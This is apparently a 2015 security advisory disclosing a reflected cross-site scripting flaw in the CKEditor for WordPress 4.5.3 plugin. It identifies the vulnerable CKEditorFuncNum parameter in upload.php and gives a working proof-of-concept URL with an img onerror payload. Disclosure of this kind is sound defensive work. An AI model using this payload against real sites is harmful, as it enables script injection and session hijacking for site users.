Subject: Cross-Site Scripting (XSS) in CKEditor for WordPress 4.5.3
Date: Mon, 31 Aug 2015 11:35:12 +0200

Hello,

Plugin: CKEditor for WordPress 4.5.3 https://wordpress.org/plugins/ckeditor-for-wordpress/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like editors) can inject html/js code (there is no CSRF protection!). Please note that plugin configuration value "File browser" needs to be set to "Built-in (old)" for succesful exploitation.

Method: GET
Url: http://localhost/wp-content/plugins/ckeditor-for-wordpress/filemanager/connectors/php/upload.php?CKEditorFuncNum=[xss]
Vulnerable parameters: CKEditorFuncNum

Example PHP callstack:
SendUploadResults   [/ckeditor-for-wordpress/filemanager/connectors/php/io.php:301]

Verification:
http://localhost/wp-content/plugins/ckeditor-for-wordpress/filemanager/connectors/php/upload.php?CKEditorFuncNum=%29%3C/script%3E%3Cimg%20src=x%20onerror=alert%281%29%20/%3E%3C/script%3E

-- 
Regards,
Marcin Probola,